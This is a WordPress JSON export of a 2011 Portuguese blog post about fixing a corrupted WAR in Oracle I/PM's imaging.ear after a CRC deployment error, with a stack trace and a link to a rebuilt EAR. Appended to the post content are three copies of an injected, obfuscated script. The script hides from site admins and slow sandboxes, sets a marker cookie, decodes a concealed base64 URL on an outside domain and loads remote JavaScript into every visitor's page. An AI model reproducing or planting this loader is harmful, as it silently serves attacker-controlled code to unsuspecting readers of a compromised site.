{"id":1394,"date":"2011-04-07T09:02:35","date_gmt":"2011-04-07T12:02:35","guid":{"rendered":"http:\/\/www.thiagovespa.com.br\/blog\/?p=1394"},"modified":"2025-10-26T22:40:35","modified_gmt":"2025-10-27T01:40:35","slug":"correcao-para-bug-no-oracle-ipm","status":"publish","type":"post","link":"https:\/\/thiagovespa.com.br\/blog\/2011\/04\/07\/correcao-para-bug-no-oracle-ipm\/","title":{"rendered":"Corre\u00e7\u00e3o para Bug no Oracle I\/PM"},"content":{"rendered":"<p style=\"text-align: justify;\">Fiz a instala\u00e7\u00e3o do Oracle ECM no Linux e um dos seus componentes o Oracle I\/PM estava com defeito. O arquivo imaging-ui.war dentro do imaging.ear estava corrompido e com CRC inv\u00e1lido por algum motivo que eu desconhe\u00e7o. O erro no console foi o seguinte:<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nweblogic.management.DeploymentException: invalid entry CRC (expected 0x4aecad02 but got 0xf805ccae)\n at weblogic.application.internal.EarDeploymentFactory.findOrCreateComponentMBeans(EarDeploymentFactory.java:193)\n at weblogic.application.internal.MBeanFactoryImpl.findOrCreateComponentMBeans(MBeanFactoryImpl.java:48)\n at weblogic.application.internal.MBeanFactoryImpl.createComponentMBeans(MBeanFactoryImpl.java:110)\n at weblogic.application.internal.MBeanFactoryImpl.initializeMBeans(MBeanFactoryImpl.java:76)\n at weblogic.management.deploy.internal.MBeanConverter.createApplicationMBean(MBeanConverter.java:89)\n Truncated. see log file for complete stacktrace\nCaused By: java.util.zip.ZipException: invalid entry CRC (expected 0x4aecad02 but got 0xf805ccae)\n at java.util.zip.ZipInputStream.readEnd(ZipInputStream.java:396)\n at java.util.zip.ZipInputStream.read(ZipInputStream.java:156)\n at java.util.zip.ZipInputStream.closeEntry(ZipInputStream.java:100)\n at java.util.zip.ZipInputStream.getNextEntry(ZipInputStream.java:78)\n at weblogic.application.internal.WebServiceUtils.isWebService(WebServiceUtils.java:273)\n Truncated. see log file for complete stacktrace\n&gt;\n&lt;Apr 6, 2011 7:05:51 PM BRT&gt; &lt;Error&gt; &lt;Deployer&gt; &lt;BEA-149205&gt; &lt;Failed to initialize the application 'imaging' due to error weblogic.management.DeploymentException: invalid entry CRC (expected 0x4aecad02 but got 0xf805ccae).\nweblogic.management.DeploymentException: invalid entry CRC (expected 0x4aecad02 but got 0xf805ccae)\n at weblogic.application.internal.EarDeploymentFactory.findOrCreateComponentMBeans(EarDeploymentFactory.java:193)\n at weblogic.application.internal.MBeanFactoryImpl.findOrCreateComponentMBeans(MBeanFactoryImpl.java:48)\n at weblogic.application.internal.MBeanFactoryImpl.createComponentMBeans(MBeanFactoryImpl.java:110)\n at weblogic.application.internal.MBeanFactoryImpl.initializeMBeans(MBeanFactoryImpl.java:76)\n at weblogic.management.deploy.internal.MBeanConverter.createApplicationMBean(MBeanConverter.java:89)\n Truncated. see log file for complete stacktrace\nCaused By: java.util.zip.ZipException: invalid entry CRC (expected 0x4aecad02 but got 0xf805ccae)\n at java.util.zip.ZipInputStream.readEnd(ZipInputStream.java:396)\n at java.util.zip.ZipInputStream.read(ZipInputStream.java:156)\n at java.util.zip.ZipInputStream.closeEntry(ZipInputStream.java:100)\n at java.util.zip.ZipInputStream.getNextEntry(ZipInputStream.java:78)\n at weblogic.application.internal.WebServiceUtils.isWebService(WebServiceUtils.java:273)\n Truncated. see log file for complete stacktrace\n&gt;\n<\/pre>\n<p style=\"text-align: justify;\">Recuperei o arquivo, descompactei e regerei o respectivo WAR. Por sorte nenhum arquivo perdido. Substitui adequadamente no EAR. Fiz um update no imaging.ear e iniciei a aplica\u00e7\u00e3o novamente. Acessei a aplica\u00e7\u00e3o e tudo funcionando adequadamente. N\u00e3o sei se tive azar ou se \u00e9 um bug pr\u00f3prio da Oracle. Caso algu\u00e9m tenha o mesmo problema que eu, estou disponibilizando a <a title=\"imaging.ear\" href=\"http:\/\/www.thiagovespa.com.br\/patches\/imaging.ear\" target=\"_blank\" rel=\"noopener\">vers\u00e3o corrigida que gerei<\/a>.<\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fiz a instala\u00e7\u00e3o do Oracle ECM no Linux e um dos seus componentes o Oracle I\/PM estava com defeito. O arquivo imaging-ui.war dentro do imaging.ear estava corrompido e com CRC inv\u00e1lido por algum motivo que eu desconhe\u00e7o. O erro no <a class=\"more-link\" href=\"https:\/\/thiagovespa.com.br\/blog\/2011\/04\/07\/correcao-para-bug-no-oracle-ipm\/\">Continue lendo  <span class=\"screen-reader-text\">  Corre\u00e7\u00e3o para Bug no Oracle I\/PM<\/span><span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[3,10,64,9],"tags":[],"class_list":["post-1394","post","type-post","status-publish","format-standard","hentry","category-java","category-jee","category-linux","category-oracle"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/posts\/1394","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/comments?post=1394"}],"version-history":[{"count":0,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/posts\/1394\/revisions"}],"wp:attachment":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/media?parent=1394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/categories?post=1394"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/tags?post=1394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}